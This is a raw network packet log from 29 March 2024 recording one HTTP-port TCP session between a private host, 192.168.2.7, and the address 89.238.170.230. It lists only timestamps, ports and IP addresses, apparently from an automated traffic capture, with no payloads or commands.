Mar 29, 2024 14:24:45.375004053 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:45.375062943 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:45.377335072 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:45.377377987 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:45.377430916 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:45.377439022 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:45.377536058 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:45.587194920 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:45.587460041 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:45.594475985 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:45.594535112 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:45.594602108 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:45.594661951 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:45.596993923 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:45.597071886 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:45.597091913 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:45.597143888 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:45.597191095 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:45.597199917 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:45.597254992 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:45.597317934 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:45.798732996 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:45.798753977 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:45.798856020 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:45.806677103 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:45.806759119 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:45.806783915 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:45.806840897 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:45.808882952 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:45.808959007 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:45.808981895 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:45.808996916 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:45.809010983 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:45.809043884 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:45.809089899 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:46.009655952 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:46.009679079 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:46.009726048 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:46.009752035 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:46.016238928 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:46.016263962 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:46.016290903 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:46.016304016 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:46.017921925 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:46.017956018 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:46.018084049 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:46.018188953 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:46.018207073 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:46.018224001 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:46.018243074 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:46.018269062 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:46.210874081 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:46.211002111 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:46.218039989 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:46.218060017 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:46.218141079 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:46.219005108 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:46.219085932 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:46.219094038 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:46.219161034 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:46.219188929 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:46.219223976 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:46.219229937 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:46.219286919 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:46.219307899 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:46.219372034 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:46.219374895 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:46.219449997 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:46.432112932 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:46.432311058 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:46.438796043 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:46.438889027 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:46.438910007 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:46.438991070 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:46.439856052 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:46.439934969 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:46.440179110 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:46.440260887 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:46.440310001 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:46.440382004 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:46.440387011 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:46.440418959 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:46.440438986 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:46.440469980 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:46.440486908 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:46.440532923 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:46.652400970 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:46.652484894 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:46.658251047 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:46.658339024 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:46.658499956 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:46.658554077 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:46.659841061 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:46.659898996 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:46.659931898 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:46.659945965 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:46.659979105 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:46.660007954 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:46.660007954 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:46.660047054 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:46.660149097 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:46.660166979 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:46.660198927 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:46.660221100 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:46.882591963 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:46.882671118 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:46.888247967 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:46.888300896 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:46.889214039 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:46.889252901 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:46.889257908 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:46.889290094 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:46.889707088 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:46.889720917 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:46.889749050 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:46.889763117 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:46.890077114 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:46.890089989 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:46.890120029 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:46.890229940 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:47.096677065 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:47.096736908 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:47.102921009 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:47.102971077 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:47.103606939 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:47.103650093 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:47.103653908 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:47.103697062 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:47.104252100 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:47.104315996 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:47.104326010 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:47.104357004 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:47.104423046 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:47.104466915 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:47.104479074 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:47.104526997 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:47.104794025 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:47.311367989 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:47.311386108 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:47.311474085 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:47.319853067 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:47.319905043 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:47.319943905 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:47.319952965 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:47.320004940 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:47.320975065 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:47.321028948 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:47.322371006 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:47.322411060 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:47.322434902 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:47.322448969 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:47.322499990 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:47.322535992 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:47.322545052 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:47.322572947 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:47.522984982 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:47.523075104 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:47.523072958 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:47.523116112 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:47.533318996 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:47.533373117 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:47.533468008 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:47.533523083 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:47.535011053 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:47.535054922 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:47.535125971 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:47.535175085 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:47.535286903 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:47.535327911 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:47.535377979 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:47.535408974 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:47.535428047 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:47.535453081 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:47.730006933 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:47.730024099 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:47.730076075 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:47.730118990 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:47.740003109 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:47.740016937 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:47.740072012 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:47.741714001 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:47.741764069 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:47.741774082 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:47.741811991 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:47.741835117 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:47.741893053 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:47.942838907 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:47.942900896 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:47.942997932 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:47.943033934 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:47.953569889 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:47.953583002 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:47.953624010 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:47.953650951 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:47.955562115 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:47.955599070 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:47.955616951 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:47.955652952 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:48.157090902 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:48.157109976 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:48.157166004 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:48.157202959 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:48.157224894 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:48.157237053 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:48.157278061 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:48.157278061 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:48.168076038 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:48.168138027 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:48.168793917 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:48.168807983 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:48.168832064 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:48.168849945 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:48.168883085 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:48.372385979 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:48.372520924 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:48.372529984 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:48.372576952 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:48.372639894 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:48.372682095 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:48.372701883 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:48.372746944 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:48.372795105 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:48.372833967 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:48.384393930 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:48.384460926 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:48.385739088 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:48.385782003 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:48.385826111 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:48.385876894 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:48.385922909 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:48.385965109 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:48.589668989 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:48.589756012 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:48.590249062 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:48.590290070 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:48.590373993 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:48.590387106 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:48.590445042 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:48.590503931 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:48.601438046 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:48.601453066 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:48.601521015 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:48.602508068 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:48.602567911 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:48.602699995 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:48.602758884 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:48.602802992 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:48.602855921 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:48.811741114 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:48.811798096 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:48.812257051 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:48.812303066 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:48.812355995 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:48.812397003 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:48.857212067 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:49.078543901 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:49.132572889 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:49.132610083 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:49.132694006 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:49.132750988 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:49.132796049 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:49.132864952 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:49.132880926 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:49.132909060 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:49.132921934 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:49.132950068 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:49.133024931 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:49.133074999 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:49.146076918 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:49.146131039 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:49.363373041 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:49.363392115 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:49.363404036 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:49.363415956 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:49.363431931 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:49.363465071 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:49.363472939 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:49.363754988 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:49.363795996 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:49.363805056 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:49.363816977 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:49.363835096 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:49.363843918 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:49.363850117 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:49.363890886 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:49.376348972 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:49.376408100 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:49.418111086 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:49.418188095 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:49.574206114 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:49.574307919 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:49.574359894 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:49.574399948 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:49.574404001 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:49.574441910 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:49.575076103 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:49.575128078 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:49.586313009 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:49.586374044 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:49.627223969 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:49.627243042 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:49.627298117 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:49.627335072 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:49.794158936 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:49.794203997 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:49.794217110 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:49.794230938 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:49.794248104 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:49.794254065 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:49.794292927 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:49.794298887 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:49.794609070 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:49.805711031 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:49.805766106 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:49.845314026 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:49.845393896 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:49.845526934 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:49.845577955 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:50.009805918 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:50.009864092 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:50.010037899 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:50.010063887 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:50.010086060 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:50.010087967 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:50.010111094 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:50.010123968 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:50.010130882 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:50.010199070 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:50.020558119 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:50.020575047 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:50.020636082 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:50.059753895 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:50.059839964 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:50.060023069 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:50.060070992 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:50.230851889 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:50.230915070 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:50.231085062 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:50.231103897 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:50.231136084 CET	49699	80	192.168.2.7	89.238.170.230
